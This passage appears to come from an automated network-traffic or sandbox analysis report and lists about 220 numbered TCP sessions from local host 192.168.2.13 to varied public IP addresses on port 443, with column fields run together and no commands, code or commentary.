                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19886192.168.2.1351232183.161.69.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19887192.168.2.1360068167.103.128.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19888192.168.2.134495894.72.15.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19889192.168.2.1335278202.106.243.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19890192.168.2.1334532120.218.218.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19891192.168.2.134668872.84.177.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19892192.168.2.1344800141.6.133.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19893192.168.2.134717819.137.43.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19894192.168.2.1358636151.176.60.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19895192.168.2.1353058130.244.252.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19896192.168.2.1355918188.202.15.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19897192.168.2.134504679.67.54.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19898192.168.2.133963248.26.239.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19899192.168.2.1342714105.83.163.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19900192.168.2.1352000180.37.209.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19901192.168.2.1344182192.229.223.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19902192.168.2.134855261.148.105.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19903192.168.2.133331650.18.114.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19904192.168.2.134340095.69.93.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19905192.168.2.1358000189.56.107.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19906192.168.2.1351422147.38.220.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19907192.168.2.1354962121.168.196.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19908192.168.2.1339250203.82.108.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19909192.168.2.1334938207.246.67.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19910192.168.2.1341474141.29.41.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19911192.168.2.1338496163.16.58.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19912192.168.2.1342846197.152.7.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19913192.168.2.134235288.3.165.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19914192.168.2.1358164174.85.154.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19915192.168.2.1360026220.212.74.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19916192.168.2.134163099.60.137.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19917192.168.2.1344676193.234.174.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19918192.168.2.133713837.114.70.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19919192.168.2.134858631.206.29.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19920192.168.2.1355754122.13.204.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19921192.168.2.1344154135.53.143.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19922192.168.2.1357054132.189.176.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19923192.168.2.136012877.103.43.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19924192.168.2.1337976222.148.6.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19925192.168.2.133838695.210.51.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19926192.168.2.134563890.115.24.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19927192.168.2.1351088148.64.179.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19928192.168.2.135695235.87.142.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19929192.168.2.1338936129.81.130.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19930192.168.2.1358724113.243.82.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19931192.168.2.134363836.115.59.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19932192.168.2.134179861.224.18.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19933192.168.2.133430046.165.141.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19934192.168.2.135914477.54.115.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19935192.168.2.1332916112.24.27.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19936192.168.2.134446634.207.90.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19937192.168.2.1355758163.33.69.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19938192.168.2.1347534217.145.47.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19939192.168.2.133822061.208.190.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19940192.168.2.135943467.91.214.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19941192.168.2.13420362.141.171.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19942192.168.2.1342250207.152.0.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19943192.168.2.1332914103.124.107.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19944192.168.2.1336894102.243.192.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19945192.168.2.134848447.106.108.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19946192.168.2.13412681.149.229.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19947192.168.2.135377288.123.10.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19948192.168.2.13343649.5.229.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19949192.168.2.1338448151.243.67.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19950192.168.2.1348440186.198.131.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19951192.168.2.13503044.165.215.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19952192.168.2.1339580123.145.118.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19953192.168.2.1353618210.81.199.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19954192.168.2.1348616137.184.95.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19955192.168.2.1342792219.238.217.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19956192.168.2.133673082.124.122.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19957192.168.2.1337230120.202.131.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19958192.168.2.1350030156.44.88.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19959192.168.2.1344988118.202.177.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19960192.168.2.1341966206.228.135.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19961192.168.2.1335910173.58.174.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19962192.168.2.1336406162.34.167.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19963192.168.2.1340254171.144.155.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19964192.168.2.1358730149.200.143.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19965192.168.2.1354500187.44.59.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19966192.168.2.1336108196.80.136.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19967192.168.2.1349696146.121.2.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19968192.168.2.134065863.181.128.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19969192.168.2.135992468.200.101.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19970192.168.2.1338032160.56.73.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19971192.168.2.1337534198.164.85.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19972192.168.2.1336896170.69.199.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19973192.168.2.1335058104.205.255.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19974192.168.2.134744044.172.51.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19975192.168.2.1350810136.212.144.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19976192.168.2.1356866190.183.113.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19977192.168.2.133585058.49.99.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19978192.168.2.1335806182.161.219.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19979192.168.2.1342166140.156.79.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19980192.168.2.135833012.76.125.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19981192.168.2.1360080158.19.162.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19982192.168.2.1352696160.248.75.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19983192.168.2.1356264202.102.33.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19984192.168.2.1355692136.64.120.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19985192.168.2.1353878195.92.219.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19986192.168.2.1357346111.208.136.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19987192.168.2.1351032126.126.88.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19988192.168.2.1337152207.177.218.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19989192.168.2.135101653.101.124.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19990192.168.2.135301613.96.234.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19991192.168.2.135468238.194.168.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19992192.168.2.1336320177.184.249.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19993192.168.2.135079277.254.49.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19994192.168.2.1338172118.215.232.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19995192.168.2.135861242.97.19.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19996192.168.2.135138882.30.24.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19997192.168.2.134362888.11.10.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19998192.168.2.135050291.34.65.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19999192.168.2.1344348198.35.59.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20000192.168.2.133521071.13.190.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20001192.168.2.1340382178.19.104.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20002192.168.2.136008617.5.104.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20003192.168.2.135088266.142.116.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20004192.168.2.134570220.173.79.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20005192.168.2.1358458140.215.137.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20006192.168.2.135321496.159.143.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20007192.168.2.1340084109.119.66.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20008192.168.2.135959214.229.7.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20009192.168.2.135014297.242.163.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20010192.168.2.1333378217.161.219.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20011192.168.2.1332898115.60.143.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20012192.168.2.134374873.5.198.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20013192.168.2.133813886.88.153.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20014192.168.2.1347030120.161.46.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20015192.168.2.1337114159.140.32.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20016192.168.2.1337060180.128.244.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20017192.168.2.1333670205.103.139.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20018192.168.2.1349844200.247.179.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20019192.168.2.136018649.237.101.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20020192.168.2.1355600117.153.69.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20021192.168.2.135140039.135.13.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20022192.168.2.1353448183.80.155.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20023192.168.2.1339054104.29.87.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20024192.168.2.135781281.112.88.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20025192.168.2.134108836.44.170.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20026192.168.2.1332980171.235.52.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20027192.168.2.134508483.17.250.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20028192.168.2.134969442.139.2.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20029192.168.2.1350586177.36.80.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20030192.168.2.1348836195.39.79.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20031192.168.2.1355280103.143.200.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20032192.168.2.1358942171.92.110.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20033192.168.2.1348376176.89.231.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20034192.168.2.1338818134.3.7.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20035192.168.2.1355044190.128.51.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20036192.168.2.1359310101.78.167.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20037192.168.2.1335484195.135.197.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20038192.168.2.133287296.241.196.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20039192.168.2.1334060187.179.78.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20040192.168.2.1343316110.70.184.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20041192.168.2.134348636.255.239.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20042192.168.2.1360436168.99.83.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20043192.168.2.1334256177.140.6.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20044192.168.2.1337572217.113.52.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20045192.168.2.135561823.62.131.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20046192.168.2.134857699.51.33.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20047192.168.2.133800659.187.10.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20048192.168.2.1344116194.226.151.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20049192.168.2.1347572162.235.207.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20050192.168.2.1339114153.212.86.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20051192.168.2.135657212.231.79.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20052192.168.2.1359690104.208.198.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20053192.168.2.134239849.94.21.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20054192.168.2.1349924176.70.184.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20055192.168.2.1354642112.104.176.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20056192.168.2.135420220.215.94.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20057192.168.2.133659480.124.229.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20058192.168.2.1357126205.240.152.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20059192.168.2.1339294118.213.112.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20060192.168.2.1337678103.244.207.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20061192.168.2.13512305.227.129.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20062192.168.2.1344970187.252.167.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20063192.168.2.1356642117.103.181.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20064192.168.2.136013479.232.169.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20065192.168.2.1356052139.170.174.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20066192.168.2.1349682174.145.152.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20067192.168.2.134872239.21.57.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20068192.168.2.1344414161.85.117.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20069192.168.2.135181060.225.243.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20070192.168.2.1358872195.96.36.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20071192.168.2.136077471.50.250.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20072192.168.2.1355432141.0.46.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20073192.168.2.135876471.84.137.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20074192.168.2.135998093.31.74.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20075192.168.2.135069675.162.43.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20076192.168.2.1334940166.216.168.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20077192.168.2.135044887.154.192.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20078192.168.2.1350176196.5.163.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20079192.168.2.1354940133.151.85.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20080192.168.2.133294041.221.180.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20081192.168.2.134251865.136.249.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20082192.168.2.1345326179.145.25.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20083192.168.2.1334750198.161.7.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20084192.168.2.1334674210.221.132.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20085192.168.2.1334044178.3.181.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20086192.168.2.1340278184.221.40.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20087192.168.2.1334802121.39.238.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20088192.168.2.1340046115.149.96.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20089192.168.2.1344778190.141.187.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20090192.168.2.135289649.69.76.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20091192.168.2.134477660.239.237.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20092192.168.2.1348228217.220.57.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20093192.168.2.133464265.108.126.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20094192.168.2.134999647.61.64.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20095192.168.2.133568694.24.194.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20096192.168.2.134237824.21.7.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20097192.168.2.1360062158.253.226.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20098192.168.2.135983482.88.94.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20099192.168.2.1359714180.149.50.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20100192.168.2.1349542196.191.46.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20101192.168.2.1353164130.170.40.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20102192.168.2.1341060124.188.50.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20103192.168.2.1342394177.232.1.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20104192.168.2.133540499.231.42.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20105192.168.2.133982677.120.57.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20106192.168.2.1352254219.150.32.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
